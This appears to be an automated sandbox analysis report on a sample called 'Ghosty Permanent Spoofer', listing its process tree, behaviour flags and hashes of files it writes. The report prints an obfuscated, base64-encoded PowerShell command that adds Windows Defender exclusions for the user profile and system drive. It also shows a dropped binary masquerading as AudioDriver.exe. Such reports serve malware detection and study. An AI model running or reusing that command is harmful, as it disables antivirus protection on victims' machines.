C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\spoof.exe"C:\Users\Admin\AppData\Local\Temp\spoof.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1104 -
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4372,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:141⤵PID:780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4100,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:141⤵PID:1688
-
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\spoof.exe
  "C:\Users\Admin\AppData\Local\Temp\spoof.exe" (tree depth 2)
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 1256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3868,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4140 /prefetch:14 (tree depth 1)
  PID: 3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3896,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:14 (tree depth 1)
  PID: 4448

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc (tree depth 1)
  PID: 1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3952,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4564 /prefetch:14 (tree depth 1)
  PID: 4176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5340,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:14 (tree depth 1)
  PID: 5916

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0 (tree depth 1)
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5352,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:14 (tree depth 1)
  PID: 5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4148,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:14 (tree depth 1)
  PID: 1580

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SDRSVC (tree depth 1)
  - Suspicious use of AdjustPrivilegeToken
  PID: 2400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5380,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:14 (tree depth 1)
  PID: 4492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5516,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:14 (tree depth 1)
  PID: 4344

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /0 (tree depth 1)
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 1612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5556,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:14 (tree depth 1)
  PID: 5228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5328,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:14 (tree depth 1)
  PID: 940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5592,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:14 (tree depth 1)
  PID: 4536
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 326KB
MD5: 48ac275f318ca27855a5fdef0b610063
SHA1: cf1b9f457450980b9292e57d0a680c5095316db0
SHA256: 2afe0db9674786a50be325c75a4897255002bfd8ac15acd01b058178f3ca8696
SHA512: b650cbd2d9eeace9973b9f659f2aa0a25235d53dbbdbc1a8db02a818ebb58621c89b890128c10fc2e68c46dd18c96298cb87dfe654e408c9525c174f77d3a5f8

Filesize: 351KB
MD5: 95bb4d6475e08bf50a5a441dbdbed8f1
SHA1: 9949380636c9980b78ef538b6ff287b34cfa68b2
SHA256: 4c546ca3aba3ee20eaf0dccfc0c9966a92d6e245e9b4554721fd06db8ac54d61
SHA512: 68b7bc1c4d601ca5dbd2a2fd7cf041008b1c8dc034a7788deca71b5db5033bf4a7913ce64076990b3d43441ee998f4813b82d21ab421ada0da3a3874f700f458

Filesize: 64KB
MD5: 9e466b4837d8431be725d6b9c1b4d9ef
SHA1: 3f247b7c89985a41d839cad351cd0fc182fcb284
SHA256: 2f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d
SHA512: 01de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418

Filesize: 4B
MD5: f49655f856acb8884cc0ace29216f511
SHA1: cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256: 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512: 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Filesize: 960B
MD5: 16846df493521e84fe47cd6b6451ec8f
SHA1: 6d99eb017c5aec08d3a7e908bbd4a051ce250c02
SHA256: 69f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9
SHA512: aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd

Filesize: 2KB
MD5: d0c46cad6c0778401e21910bd6b56b70
SHA1: 7be418951ea96326aca445b8dfe449b2bfa0dca6
SHA256: 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512: 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

Filesize: 805B
MD5: 9d0cacca373731660e8268a162d9d4ff
SHA1: a82111d00132cdf7ef46af5681601d55c6a0e17c
SHA256: 95932f81206717ff86f0974ee37dc40d5d914f730f00a08344b4c1765d663394
SHA512: 8c971ab501fc322b13f53b03325b2295e1eedb12b6d50a4225e6e3b4bf5128665b1a3d8b560a8b04f14bfa6f5cba41058e4f546139101fc303f3b8393f5ca485

Filesize: 18KB
MD5: b1953e43deba9376626df75b5aaf0ea3
SHA1: 04885405aa511a5cbce458c807e3afd38b043ec6
SHA256: b220f715d1c942778d3864c0b353f69d00ccd58a4136aa5b692b6668a905327d
SHA512: 540badb6c5bb66487a83f1241ce9b04912f61d1c960490f505e7f6c6deb3afafad999b2dd9413d5c99bb155c72bdf57385a9abb06461f4971b3098ed4804ef57

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\activity-stream.discovery_stream.json.tmp
Filesize: 25KB
MD5: 7b0174dde10315f3c610bb51ecb47b93
SHA1: 9a1f31079ea91ee760b263c890e3ae609d3a14f6
SHA256: fdad8e30fa8d1c8283d3c4fd80bd755e2bc3f5a466d0589047952d51ee93ca75
SHA512: 186721481f416188ad9c23fae44e24e32f4b0e7038da018a13df2d486aa0298bde9ba31d194f7f1f9fcc44454309be7d001993a2791248afb144161e2c7e1e7a

Filesize: 12KB
MD5: f6d4539d582bfda28ea49621c5f9920f
SHA1: 27aa9773d41e1bb20edcaa017205eb216e633d14
SHA256: f3a015e99aa3a9e869351ff473374a9eecd52eb1931e51a574d99a857a37dd30
SHA512: dec0f7ffc64a0d8cb86c978d4a9c19c0753a81612e5a5cf55ae99d8ac493ff449246a20f9c190190c0d54ce4d3290eb52344ea36e818cf717d7dab3495fc0772

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\cache2\entries\D18FB7DA89F8DD4E7A2C97703A1647E8C981D05A
Filesize: 13KB
MD5: 972e381c0628c0a468911fab4f42a941
SHA1: 8f7ed26692f537ad45676efd0e8afdd986e09770
SHA256: aa03f52eb96b9b2c90353bf666033ad8c27e6d00fb7035f060db9097b0ca9846
SHA512: d85257cbda3ee78955abcdea12ed1b1c30721d034c5292043ffb044a8d9b2941265d420bb6eb812e4069a111f604cb306715a568f7c72fd939b9ae2c9f81380b

Filesize: 4.9MB
MD5: e65c905174e5f9951a79413833422356
SHA1: 9a8f620da9358e95323548943ca06e6259f44623
SHA256: df7e9a74650903532a58491fb925a97114c765d8551b205d5b74cd77b6d0e062
SHA512: 534f96d756e4584b2e5a441c059ae9456b7e899e1cca3e95ed3a9c65313ceb872575a6e29b38aba57139fe4c8660d31dda9842a6ad1c6f735aa2d93473711465

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 1.2MB
MD5: d66d5168a0fb7326e23963f4e8502e32
SHA1: 8e5d448ff498a01afc000f9be8a3d5a6591c2a9a
SHA256: 7d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e
SHA512: 5a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19

Filesize: 479KB
MD5: 09372174e83dbbf696ee732fd2e875bb
SHA1: ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256: c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512: b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Filesize: 13.8MB
MD5: 0a8747a2ac9ac08ae9508f36c6d75692
SHA1: b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256: 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512: 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Filesize: 626KB
MD5: d8aec01ff14e3e7ad43a4b71e30482e4
SHA1: e3015f56f17d845ec7eef11d41bbbc28cc16d096
SHA256: da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e
SHA512: f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize: 9KB
MD5: d44fba699f50cb827810f7db024a4725
SHA1: 28bade42fcad9eb9431f3f5df4eb5d030b4189c2
SHA256: 0a49110106626e5c4dbcafa6bee5b62d4a33bd63242db7c76b91ebbf3f6dc049
SHA512: 93f9a80fd005ee0145cecdf755e44848353fd05776b535bbd3aa3522dd7eff1087f5571ff900450769e02e930185754a071491a4bf847566613a8eaf4289cdb2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXJWNMIUF5K7RPD9ZMRW.temp
Filesize: 9KB
MD5: d0df2a46f7341a1b0840b44c7bdbe320
SHA1: 6b2d1c27203f9c78bd6a19390cdfd16f077b8e91
SHA256: 29617cdaf0d6518df7929553bd0a3838c1d124ea4f6ba18c9250abcb998e5580
SHA512: bcc820faa47178ee5bf0e5f866c40c4bfb0ef9dca0d7955a40434243ae88778fb46c5144132c50daf5b6595827d7a94718f6706f50c40811b2ad48ec452a504c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin
Filesize: 11KB
MD5: 6a97d73f6ab1c5e806d3c52b85026530
SHA1: f7f63a35679fd3023b64a5d993425be193dfb92b
SHA256: c44993d747d13befb512a424ec2864b8e273eb9a86feb751c23af8e47d6e0564
SHA512: 09147756b9391e4da4a9c7784297d01f672001b793b664092a7d05732352a2bb3ccff368e275ccc6870f603604e2522bb323ca3a523e79dcdf893994fc3fa340

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin
Filesize: 7KB
MD5: 5b42b732d823d6e91b70191f65c5a20c
SHA1: a66c191991f5b27bdd3bd352a6036da8eeaddb2e
SHA256: f05752a8b6e72d1f5cc661807b3bde8a16f341ce01fb654bb24ae345e8839ecf
SHA512: 50dec86b78413a4fef5aaff9a4a1999a90233fdee067d2010b90f8835da4f8a772f56330650ed94f551310700f776f3ae2b97949663605b32cc421872e0d84c6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 6KB
MD5: b5b461d6c6589cab7d235b572bdf29ef
SHA1: b4f609c459d8b42e40daf786f5555fd95a33f7ee
SHA256: f9ec1449cef60d8275f8a94e1c63e3c76341796a8b03824830d54404ee3e5280
SHA512: e83d7d33700061551b6e1b26e4693617ffce902fad686abc37581a2491cb197c1d10624aa7bca0cadf589f46a71409e0ebca61b0d43b65ea57a256d7f3d32017

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 58KB
MD5: d8b7c8b4980dd236f0a245043ca66590
SHA1: 34f2660025093a6385223c399223918f8d59b564
SHA256: eec75971f4bf9868f8897168add7c77a609b620d56ec1bfcd228afd24eedea4a
SHA512: 9fb44ce2ff03a9e2dad8158b49394b0ebc1aefa271654c8313e153b73482ebc0167f6ac255afa6bd4203584e7e80f22fdf51d7da73ed5492a5891cbec0dc903f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 5KB
MD5: 5a1d187cbba0b0b8b8cdf5efb60ea46c
SHA1: 593589f1b21445192a8732a59ed5d7b432cf33a3
SHA256: 8e4e9d285e4cf13dee6ed3eae7fe4f21ba9b02c3a3ebfd930d3c341dbaf7dbf6
SHA512: 717844986158efb09263f0894ebfef93e3bf9f61e4715aec42d9e75012f715557ae63ca7622d74c264d7fc1a48903391539645d3e8e639cb3eb09b924a4f3adf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 24KB
MD5: a4db4e7be4eec45476556b05e3587338
SHA1: 61b8b7cc6124011639ed34ce5005f5190fff7950
SHA256: 625e04d493f408ceb8e34511fe1eb78951520d7fc90cd205a9366099e8776798
SHA512: e36a267cc880d6480197f617ecd7302e69b67e73b3cb7d70f0e4ba187f5e902f3e2d98256075184ee92159cc2e1a869766412861872b58c7b9f69e22e3eb0605

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 37KB
MD5: 3573511fb882d497924a3f9004ec6c2f
SHA1: 4bf20f93c8c0d1c4cb3d886fa36c93c6e4812604
SHA256: 4800fb3eb03d64482f38dff7879aa1acd3e6f2c8a65c7d27bb5a477b4fb4ffb9
SHA512: ce82ce8b94c4117ac332434415e218954bfb61ce6f7f0991f4c9793f3c69679af2a0c8ba7ba3fbfdd0592218f1fab0eced6aadc1a0a998a5d0bde314fe1893a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 5KB
MD5: 5badba29d84c4d9b2f7d3b5a329fa9c7
SHA1: 958639c7b3f45a6c07a96f88e1f8f396e33a3c82
SHA256: 24008cee02921adbe134d02e9960985ce3f6be82daa62206106ecbf84cff6639
SHA512: eae4ea93281a7de0aa053377ed64b3b3e160266dc3da94d351d3e0822f9edecbcfd4299d0b1f75437b6ec50e25ef9fbaeb7c7e1be7110d486b139a4d3079af8e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize: 5KB
MD5: 14d4c4c51e6942567fc440050917d9ad
SHA1: 5fb8e8684e57900aa600a25c5f588207bfe7c4eb
SHA256: 5e3f015811d62d0d4c3e4db7f59cf24c256cfdff4d5d20b8b549d50ae71a6fb6
SHA512: 1f01aaa7c5021924d53ea479087bd127e5a99e1d157f8b7eb78cfd0e7298cd3a4b966a2882d4b14892c18e9d21fc4487eb2b94dafb78892459e007857693087f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\5b6aa8ae-2577-4190-af3a-019ae30c58d3
Filesize: 982B
MD5: 65074be749b0d51df7ea8cbaaff0f948
SHA1: 1ae75b691d958b357b4f4730aac047c06cd04707
SHA256: 6a10b4168a1eaf24fe692cb51bbb830561400920a30018b3696b19987a38f0d8
SHA512: ae79eb9f3893febfdef2a18befd9e7001aa2f5dcc904fad8d899be1610c795aec30e15ec533f013d2721e2abce5a0c3a8e4a6acf19805103835f848722ecad39

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\a34ab117-bdbd-4021-bc21-ef872400f728
Filesize: 25KB
MD5: d3546c659bdc45f4958503d9d0e90907
SHA1: 18dca2fe3254a38af00a047e882a2b3681592856
SHA256: cbf9db51c54e020120a56c688afea32a6509d2475105171ab1629d73e44fbc38
SHA512: 5a7a40e16df5cc9cb5c0cf7e4cdd59899d1813f5a6961cd998c967e96c3e7baeca36232a4f3db2142f6d87df2d5299372f79e70b0b2ae5ceb9031e9406d1b940

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\f78c39ac-f480-49c9-9913-00b5c0f975e5
Filesize: 671B
MD5: f27a66ef22859656c6def2f8bcdb6b13
SHA1: 7838be6019e29f41b4f83f5c1517f672ab3b2186
SHA256: 434b0c0a792f73d019451825c483d6bbf8f4d5ab99f8089f46831b45f0b31363
SHA512: b3371e6764883c4ae761947378a5079509941373e47798721f862a5bb25c97e53559bdc25bd3895ee6d0d143bade8ce5c524d0b0e78135e1eddc3252e3958aa0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize: 1.1MB
MD5: 842039753bf41fa5e11b3a1383061a87
SHA1: 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256: d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512: d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize: 116B
MD5: 2a461e9eb87fd1955cea740a3444ee7a
SHA1: b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256: 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512: 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize: 372B
MD5: bf957ad58b55f64219ab3f793e374316
SHA1: a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256: bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512: 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize: 17.8MB
MD5: daf7ef3acccab478aaa7d6dc1c60f865
SHA1: f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256: bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512: 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Filesize: 14KB
MD5: 8b64fdd782fbda54bc14e448536a8895
SHA1: 5a2b4db7e30662c1c7f0a807d666e75480c32c80
SHA256: c123c192a0db1595bbcdc9299e25af79e04d694cd1a94b19d8f4718e3814b60a
SHA512: 7f29551fdbea47518883b3f0bd6f1db345dd54890a6a0a9273ce9f11b104d6703d772f46c7925ced19c1fb504087d6f6e970a46771b6cdceb93d7b1b71c05dd9

Filesize: 11KB
MD5: bd2a5936e3938aee2725bcdf45ecc8b7
SHA1: d5c9bded80f5aa57e990bbe8159166d9da7f17af
SHA256: ee00e20864234ed0c0be48f9946b3a161368b374d2712720e40b64605b4f6306
SHA512: 126c8f29de04f886db11239cb52dcc653791e76417965932b85a039ca00c4fc0cc1ffdc9f59a5b5c2166be58817146b524aac386b5ae513dc3ae10a2e1e7fbbf

Filesize: 10KB
MD5: bc8b7514a503f048c24474652110e5f5
SHA1: 28804a62648a60a2a9170062eacdc16698e3bb25
SHA256: f9eedf53b694e2b485dbd81af62d0bfdf3d5e5bda8b55c31f56d7be9903ea3bb
SHA512: b34dc93ab2f080a3ede09cb80a4a9e7e85e140382aaceeafc03064c147ebae569b10d6d762d4d4f931d20277d5524cc0d5e04412bb1e84151e9671b026ce87ae

Filesize: 11KB
MD5: 54bbbd5c9d3911e6ce748a6dc074d854
SHA1: f531b9aaa03382570569be92b84f289080a3f4c9
SHA256: fa2ee9eb5e596e86e5d4eb48f428487a66f917bc815d8b540d48e9d292187386
SHA512: df1e29a980cc86e9aa08c23eb38d1551ad6bea51dc3b39a4cd9043350cc584d12457a7d20e15e3ac577b0491219d5a08bf4edfeb4211fe63d3bfeb95aa7fbf33

Filesize: 9KB
MD5: b66217961400abedd7cb6a08cec09ad5
SHA1: 381e6dc60ecd7f75551edbb36415349f0fbdd153
SHA256: 5b123e40e3f16279b3ed730cdd94456c63c29ef15506a08662b515373e8b3edd
SHA512: dce3b93cd65403b54abec9597456d91231e178ee9fa4036008d06198698ffe74c67984a23eef1e6d927a9e9558f66e6f9e760a20f064d6506c69014163ddf854

Filesize: 9KB
MD5: c294a9b2eba6998f6629169fd28d3afb
SHA1: cb74122d25893cf2d0d6e1b15c49f361ce4a831d
SHA256: 9472a2461c9269d7b1b9f1d8a1d7bc5993ea7ad9a3ce2c027ca106a849285cc9
SHA512: ab7816f159f03597c89955f4a0bf18fe802bf046663917e8aeaf14f3aa067cee97aa54c9b71bd946bedf9d157b08a0e39031a30ba705b6ac2067cd8cac7320dd

Filesize: 10KB
MD5: 85b27a92c23a13617b74aae8b60549d5
SHA1: 0ad4b6588ee2671f23c78d389d6ed5baa527f524
SHA256: e2b71e4c1b5bb7fb9bbb0712d9b3a6895574e51b1cc63389dfbb5a32d90ab299
SHA512: 9f0d50b6f08571cddc3391953a72172070c1c391953f4e4faa28fb1aca431faff1aeebf14bc02b88f9e69bb62a7ed3a6c91b16d408eb2852157e0aa5aa45a8f7

